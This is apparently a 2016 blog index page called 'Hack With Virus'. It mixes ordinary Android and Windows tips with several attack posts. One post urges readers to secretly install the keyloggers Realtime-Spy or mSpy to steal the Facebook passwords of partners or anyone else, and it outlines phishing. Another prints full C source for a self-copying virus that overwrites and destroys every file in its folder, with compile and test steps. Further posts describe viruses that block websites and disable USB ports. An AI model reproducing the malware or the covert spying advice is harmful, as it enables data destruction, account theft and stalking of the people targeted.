Wednesday, 15 June 2016

Top 3 Facebook Messenger Alternatives

Facebook apps on Android are known to make the phone slow and sluggish. In one of the recent experiments conducted by The Guardian, it was proved that Facebook apps

Top 3 Facebook Messenger Alternatives

Read More

Thursday, 9 June 2016

Top 5 Apps To Hide Text Messages On Android

We are living in a time when a lot of our conversations take place through messaging apps on our smartphones. While most of us use the popular messaging apps like WhatsApp, Hike, Viber, Facebook Messenger, etc. 

Top 5 Apps To Hide Text Messages On Android

Read More

Texting friends on WhatsApp,clicking salfies with the camera, jotting down notes or preparing for a board presentation. We do so much with our Android smartphones and thus, it’s important to keep track of things you might be doing wrong on your device. 

5 Things You are Doing Wrong on Your Android Device

Read More

Wednesday, 1 June 2016

11 Best Free Tools to Download and Install Drivers in Windows

Driver Fixers are smart utilities that fixes any driver problems in your system. These apps download and install missing or outdated drivers on your system, thus improving its stability and performance. 

11 Best Free Tools to Download and Install Drivers in Windows

Read More

Tuesday, 31 May 2016

9 Best Free Antivirus Software

With an increasing amount of time that you spend doing things like browsing the web, downloading favorite content, or working on the computer in general, it’s extremely important that you have a great antivirus program at your disposal, for safeguarding all that valuable data from malicious programs such as viruses, and spyware.

9 Best Free Antivirus Software

Read More

Find Your Twin: Best Tools To Find Your Lookalike Internet
There’s a very popular theory that says ‘there are 7 people around the world who look alike’, which means each of us have a twin somewhere across the world. Maybe it’s true or maybe it’s not , no one knows about that but we all have that curiosity to know about our doppelgänger or twin. 

Find Your Twin: Best Tools To Find Your Lookalike Internet

Read More


Top 8 Games Like Clash Royale
Clash Royale is one of the most popular games on different mobile devices out there. This game combines the goodness of card games with strategy games to create something more unique and exciting for the casual gamers out there.

Top 8 Games Like Clash Royale

Read More

Monday, 30 May 2016

How to Remove Background from Images Without Photoshop
Whether it’s photos taken to commemorate special events, or random selfies shared on social networks, or anything else, Digital images are probably (one of) the most common type of files that we work with on a regular basis.

How to Remove Background from Images Without Photoshop

Read More

Saturday, 28 May 2016

What Google Knows About You? Here’s How To Find Out

Google has been criticized a lot for its data logging practices and that isn’t really a surprise, because we all know that Google needs the data for its advertising revenue.

What Google Knows About You? Here’s How To Find Out

Read More

Wednesday, 18 May 2016

10 Common Problems in Windows 10 (With Solutions)

Windows 10 is unquestionably awesome with its experimental yet innovative features. Along with its exciting features also come bunch of bugs that have troubled lots of people including us.

10 Common Problems in Windows 10 (With Solutions)

Read More

Saturday, 14 May 2016

How to Print Any Document From Your Android Device
Modern day smartphones have eliminated the need to keep a hard copy of a document but if there’s something you must print, Android smartphones let you do that as well. 

How to Print Any Document From Your Android Device

Read More

Friday, 6 May 2016

Top 3 Recycle Bin Apps for Android

To err is human and therefore, we always make sure we have some sort of fail-safes to watch our steps.

Top 3 Recycle Bin Apps for Android

Read More

Monday, 2 May 2016

What is IMEI number and How to Find IMEI Of Any Device

You might have heard of the term “IMEI number” numerous times and chances are, you have heard of it while buying a new phone, selling your older phone or when you are reporting a case of your phone being lost.

What is IMEI number and How to Find IMEI Of Any Device

Read More

Wednesday, 27 April 2016

How to Use Android Device As  PC Speaker

You would agree when we say that we all have faced audio problems on our age old Windows PCs and laptops. There have been numerous occasions when the built-in speaker has stopped working, or the audio jack has been broken and that’s when we would feel pretty helpless.

How to Use Android Device As PC Speaker

Read More

Saturday, 23 April 2016

1. Create Undelete-able Folders

6 best uses of command prompt (CMD)

You can create undeletable folders using specific set of keywords. In the Command Prompt, type the name of the drive where you want to create the folder (it must not have Windows installed in it).

6 best uses of command prompt (CMD)

Read More

Friday, 22 April 2016

12 Useful CMD Tricks that you would have ever seen.

When you have such an attractive interface, using Command Prompt might seem like a old fashioned thing.

12 Useful CMD Tricks that you would have ever seen.

Read More

Tuesday, 19 April 2016

How to remove computer virus using command prompt(CMD)

Each file and folder have the following attributes:

1).  Archive A
2).  Read Only R
3).  Hidden H
4).  System S

How to remove computer virus using command prompt(CMD)

Read More

Friday, 15 April 2016

Display Legal Notice on Windows Startup
If your PC has multiple users or you have your PC on a public place, then you can now display legal notice to every user before they log in to your PC.

Display Legal Notice on Windows Startup

Read More

How to Change the Logon Screen Background in Windows 7

How would you like to change the logon screen background in Windows 7 so as to give your Windows a customized look and feel? With a small tweak it is possible to change the Windows 7 logon screen and set your own picture/wallpaper as the background.

How to Change the Logon Screen Background in Windows 7

Read More

Wednesday, 13 April 2016

How to Hack a Computer

The question “how to hack a computer” is probably the one that is most frequently asked by many Internet users and hacking enthusiasts. So, in order to address some of the common questions and doubts on the subject, I have decided to write down this article.

How to Hack a Computer

Read More

Monday, 11 April 2016

            
How to Track a Cell Phone


            Are You Looking to Track a Cell Phone Location?
           Relax, Here is a Complete Cell Phone Tracking Guide!


 Are you looking to know how to track a cell phone with pin point accuracy?

How to Track a Cell Phone

Read More

Saturday, 9 April 2016

How to Hack WhatsApp Account

Need to Hack WhatsApp Account?
Below is a WhatsApp Hack Guide with Complete Instructions!

Learn how to hack WhatsApp in simple steps with the following easy to follow and foolproof tutorial.

How to Hack WhatsApp Account

Read More

How to Spoof MAC Address on Android Phones

Media Access Control address (MAC address) is a 12-character unique identifier assigned to a specific piece of hardware such as the network adapter of your WiFi device.

How to Spoof MAC Address on Android Phones

Read More

How to Hack successfully Gmail Password.

With Gmail being one of the most widely used email services across the globe, it has also become a favorite place for many to engage in secret relationships and exchange cheating messages.

How to Hack successfully Gmail Password.

Read More

How to Hack Facebook Password

Need to Hack Someone’s Facebook Password?
Here’s a Complete Guide on Possible Ways to Hack Facebook!
In the recent years, Facebook has also become a popular place for many to exchange secret messages and manage illicit relationships. Therefore, it’s no wonder many people make up their minds to hack Facebook password of their loved ones. May be you’re in a similar situation or just want to hack the password of any Facebook account, this article will surely help you out.

Recently, a lot of fake websites have popped-up on the Internet making false promises to hack the Facebook password of any account. These sites often demand people to take-up a surveys in order to reveal the password of the hacked Facebook account. This is only a trick to make quick money by forcing people to take up surveys. However, upon completing of the survey no Facebook password is given to the people. So, I always warn my visitors about such scam websites and their fake promises about hacking Facebook.


Possible Ways to Hack a Facebook Password:

With over 2 years of experience, I can tell you is that there are only TWO ways to hack a Facebook password.:

1. Using a Keylogger – Easiest Way to Hack Facebook!


A keylogger when installed will simply record each and every keystroke that a user types on a specific computer’s keyboard including Facebook or any other account password.
Since keylogger requires no special skills to install and use, it is the easiest way to hack a Facebook password. I recommend the following keylogger program asthe best one to gain access to Facebook or any other online account:
To Hack Facebook Users on PC/Mac:
How to Hack Facebook Password


Why Realtime-Spy is the Best?
Realtime-Spy Top Features:
  • Remote Installation from any corner of the globe.
  • 100% stealth operation and remains undetected!
  • Extremely easy to use as it requires no special skills to install.
  • Compatible with Windows XP/Vista/7/8 (32 and 64-bit) and Mac.

How it Works?

To hack the Facebook password, all you need to do is just install Realtime-Spy on the target computer. When the target user logs into his Facebook account from this computer, the login details (username and password) are captured and uploaded instantly to the Realtime-Spy servers. You can later access the stored logs to obtain the Facebook password.

Download Realtime-Spy – for Windows
Download Realtime-Spy – for Mac

To Hack Facebook Users on Mobile:
To hack the Facebook password of mobile users, there is a mobile version of this program called “mSpy”.
Download mSpy – for Mobile Devices
Supported Phones: Android, iPhone, iPad and Tablets.

2. Phishing – The Difficult Way:

The other common way to hack Facebook account is via Phishing. This method will make use of a fake login page (spoofed web page) which will exactly resemble the original one. A spoofed web page of Facebook looks exactly same as that of the original Facebook website. This page is actually created by the hacker and is hosted on his own server. Once the victim enters his/her Facebook password on such a fake login page, the login details are stolen away by the hacker.
Phishing requires specialized knowledge and high level skills to implement. Therefore, it would not be possible for a newbie user (perhaps like you) to attempt this trick. It is a punishable offense too. So in order to successfully hack the Facebook password, I recommend the usage of keylogger as it is the easiest and the safest way.

Why do People Want to Hack Facebook Passwords?

You many wonder why people want to hack the password of someone’s Facebook account. In most cases people attempt to hack the Facebook account of their boyfriend or girlfriend so as to find out what is going on behind the scenes. These days parents are also concerned about their child’s Facebook activity and would like to hack their Facebook accounts to monitor. A husband or wife may try to hack the password and gain access to a suspicious partner’s Facebook account and so on. While most people have a strong motive behind their need to hack passwords, there are a few who also hack Facebook password just to exhibit their skills.

Facebook Hacking Methods that Do Not Work:

  1. There is no ready-made software program that is available to hack Facebook password (except the keylogger). In fact, keyloggers are pretty generic and are designed to log the keystrokes of a specific computer which in turn can be used to hack Facebook passwords.
  2. It is no longer possible to use conventional methods like brute-force approach to hack Facebook password. This is because big time players like Facebook have employed tight security measures to protect themselves against any such password hacking attempts. Since Facebook has millions of users, they take every possible security measure to safeguard their accounts which otherwise could cause a severe impact on their business. So, if you come across any website teaching such age old tricks, please be assured that they cannot be successful against Facebook.

Common Myths About Hacking Facebook Password

Unlike what many scam websites claim, Facebook website or Facebook servers do not contain any flaw that allows hackers to crack its password. The only Facebook hacking method that can give you the password is keylogging and phishing. None of the other methods is known to obtain the password for you!
DISCLAIMER: YOU IMPLEMENT ALL THE INFORMATION PROVIDED IN THIS ARTICLE AT YOUR OWN RISK. USAGE OF SPYWARE WITHOUT PRIOR USER CONSENT MAY BE AGAINST YOUR LOCAL LAWS AND YOU DO IT AT YOUR OWN RISK!
THE END

How to Hack Facebook Password

Read More

Friday, 8 April 2016

How to Create a Virus to Block Websites

Most of us are familiar with the virus that used to block Orkut and Youtube websites. If you are curious about creating such a virus on your own, here is how it can be done.
As usual I am using my favorite programming language ‘C’ to create this website blocking virus. I will give a brief introduction about this virus before I jump into the technical jargon.
This virus has been exclusively created in ‘C’. So, anyone with a basic knowledge of ‘C’ will be able to understand the working of this virus program. When this program is executed, it will block all those websites that are listed in the source code. In the following example, the sites that are listed in the source code are Google, Yahoo and Youtube. When you download the source code of this program, you have a choice to include your own list of sites that you want this virus to block.
I have just removed the source code of this program from this post as it is lengthy and makes the post look messy. You can still download the source code of this virus program from the following link:

How Virus Program Works?

The Windows operating system maintains a special file called HOSTS which can be used to block any given hostname or domain name (website) by adding new entries onto it. This program works by modifying the HOSTS file by adding new entries of those sites that are intended to be blocked. The HOSTS file is located at:
%windir%\system32\drivers\etc (Usually: C:\windows\system32\drivers\etc)

So, when you execute this program, all it does is add the entries of the list of those sites (mentioned in the source code) to this HOSTS file. Once this is done, the site will be blocked from your computer. So, none of the browsers would be able to load those sites on your computer.

Now, as far as the technical part of this program is concerned, people who have a working knowledge of ‘C’ should be easily able to understand the working of this virus program. However, for those who are new to ‘C’ programming, here is the algorithm of this program:
  • Determine the Root drive. ie: Find the drive (C:, D:, E: or F:) on which the Windows is installed.
  • Navigate to: %windir% -> system32 -> drivers -> etc
  • Open/Load the HOSTS file.
  • Copy a list of those websites that are mentioned in the ARRAY to the END of the file.
  • Save the file and Exit.

How to Compile the Source Code?

For a step-by-step compilation guide, refer my post: How to compile C Programs?

Testing the Virus:

  1. To test, run the compiled module. It will block the sites that are listed in the source code.
  2. Once you run the file block_Site.exe, restart your browser program. Then, type the URL of the blocked site and you’ll see the browser showing error “Page cannot displayed“.
  3. To remove the virus type the following command in the Run.
    %windir%\system32\drivers\etc
  4. There, open the file named “hosts” using the notepad. At the bottom of the opened file you’ll see something like this:
    127.0.0.1 google.com
  5. Delete all such entries which contain the names of blocked sites.
THE END

How to Create a Virus to Block Websites

Read More

Wednesday, 6 April 2016

A Virus Program to Disable USB Ports



In this post, I will show how to create a simple virus that disables the USB portson the computer (PC). As usual, I am using my favorite C programming language to create this virus. Anyone with a basic knowledge of C language should be able to understand the working of this virus program.
Once this virus is executed it will immediately disable all the USB ports on the computer. As a result you’ll will not be able to use your pen drive or any other USB peripheral devices on the computer. The source code for this virus is available for download. You can test this virus on your own computer without any worries since I have also given a program to re-enable all the USB ports.
Download the source code of the virus program on to your computer from the following link:

  1. The download contains the following 2 files:
    • block_usb.c (source code)
    • unblock_usb.c (source code)
  2. You need to compile them before you can run it. A step-by-step procedure to compile C programs is given in my page – How to Compile C Programs.
    3. Upon compilation of block_usb.c you get block_usb.exe which is a simple virus that will block (disable) all the USB ports on the computer upon execution (double click).
  3. To test this virus, just run the block_usb.exe file and insert a USB pen drive (thumb drive). Now you can see that your pen drive will never get detected. To re-enable the USB ports just run the unblock_usb.exe  (you need to compile unblock_usb.c) file. Now insert the pen drive and it should get detected.

      How it Works?
    The idea behind the working of this virus is pretty straightforward. It works by gaining access to the Windows registry and modifying its settings to disable the USB device support on the computer.
    On the other hand, the other program will re-set the registry settings back to the normal so that the support for USB devices is re-enabled. I hope you like this post. Please pass your comments.
    THE END

A Virus Program to Disable USB Ports

Read More

How to Create a Computer Virus?How to Create a Computer Virus?

This program is an example of how to create a computer virus in C language. This program demonstrates a simple virus program which when executed creates a copy of itself in all the other files that are present in the same directory.
Thus, it destroys other files by infecting them. The infected file will also become a virus so that when executed, it is capable of spreading the infection to another file and so on.
Here’s the source code of the virus program:
#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h>

FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;

void main()
{
st=clock();
clrscr();
done=findfirst("*.*",&ffblk,0); //Search for a file with any extension (*.*)
while(!done)
{
virus=fopen(_argv[0],"rb"); 
host=fopen(ffblk.ff_name,"rb+");
if(host==NULL) goto next;
x=89088;
printf("Infecting %s\n",ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf("DONE! (Total Files Infected= %d)",a);
end=clock();
printf("TIME TAKEN=%f SEC\n",
(end-st)/CLK_TCK);
getch();
}

This virus is designed to infect all types of files with any extension.


You can download the source code from the following link:

How the Virus Program Works?

The algorithm of this virus program is as follows:
Step-1: Search for files in the current directory. If one or more file is present, load the first file (target file).
Step-2: Load the copy of the virus itself onto the memory.
Step-3: Open the target file. Copy the virus code from the memory and place it in the target file. Close the target file when the copying process is completed.
Step-4: Load the next file to infect and move to the step-3. If all the files are infected, close all the open files, unload them from the memory and exit.
As far as the technical terms are concerned, I would not be able to explain the program line by line. Anyone with a working knowledge of C should be easily able to understand the functions and other terms used in the program.

How to Compile the Program:

For a step-by-step guide, you can refer my detailed page on- how to compile C programs?

How to Test the Virus After the Compilation:

  1. Create a new empty folder.
  2. Put some executable files (or any other files) in the folder.
  3. Run the PC_Virus.exe file. With in a few seconds all the other files in the folder gets infected.
  4. Now every infected file is a new virus which is ready to re-infect. You can copy any of the infected .exe file to another empty folder and repeat the same procedure to see if the infected file is capable of re-infecting. Delete the folder and all the infected files after the testing process is done.
NOTE: The files infected by this virus are destroyed completely and cannot be recovered. So, always test the virus in a new folder by placing some sample files.
WARNING: FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD OR MISUSE THIS VIRUS CODE.
THE END

How to Create a Computer Virus?

Read More

Saturday, 2 April 2016

how to make a hologram with your smartphone

Live 3D Holograms are the things of the future. We all have seen people using 3D Holograms in Movies, but have you ever wished to see on for real in front of you. Well, now you can.
In this IBUVIRUS I will teach how to make Mod your smartphone to make a 3D projector out of it by keeping just a little device on the samrtphone screen, which can be made of materials available at home.
You can view this 3D Hologram without the help of any glass, all you need is a smartphone and the small device, which I will teach you to make.

Step 1:- Materials Required

how to make a hologram with your smartphone

->Graph paper
->CD case
->Marker
->Pen
->Pencil
->Pair Of Scissors
->Sellotape and/or Superglue
->Craft Knife or Glass Cutter
->A Smartphone


Step 2:-Extracting The Blank Plastic Side From CD Case

how to make a hologram with your smartphone

STEPS (Refer to images for further help):
  1. Take out the Paper Cover from the CD Case
  2. Cut the Plastic Cover on top of the CD Case
  3. Cut the CD Case from between to get the blank side of the cover, i.e. the side opposite to the side where we keep CDs.
  4. Now you have successfully retrieved a thick plastic sheet from an old CD Case

Step 3:-Tracing The Trapezium

how to make a hologram with your smartphone

Step 4:-Cutting The Trapezium From The Plastic CD Case

how to make a hologram with your smartphone

Using the graph paper cut-out we got from the last step, trace the trapezium on to the Cd Case using the Marker. Refer images to get a more clear idea of what you're reading. Repeat this step 4 times
Using the Craft knife or Glass Cutter cut through the Marker lines and as a result you will get 4 trapeziums.
With the completion of this step you have completed 90% of the work.

Step 5: Making A Plateau prism

how to make a hologram with your smartphone
how to make a hologram with your smartphone

Imagine a prism (Pyramid) with the top chopped of, what you get is a plateau prism. We are trying to create something exactly like that.
STEPS:
  1. Tape these 4 trapeziums together and, what you get would be exactly what we need. But, if on taping what you get is nothing like a prism but just a flat shape, it means that you did not cut the shape(s) correctly in the last step and made some mistakes which led to formation of trapezium with wrong dimensions, recheck your measurements.
  2. Apply glue/superglue, where the non-parallel sides meet (Place where you applied tape) and let it dry.
  3. If you are happy with what you get, you may remove the tape. [I did not, as it makes no difference]

Step 6: Making the Projector Work

how to make a hologram with your smartphone

STEPS:
  • Just place the prism upside down (Broad side on top) on the centre of the screen at the point where you see 2 white lines intersect at the start of any video. (Refer to image for more clarity).
  • Play the video and watch he magnificent 3D Image formed.

THE END

how to make a hologram with your smartphone

Read More

Print OR PDF

Copyright © 2014 HACK WITH VIRUS | Designed With By Blogger Templates
Scroll To Top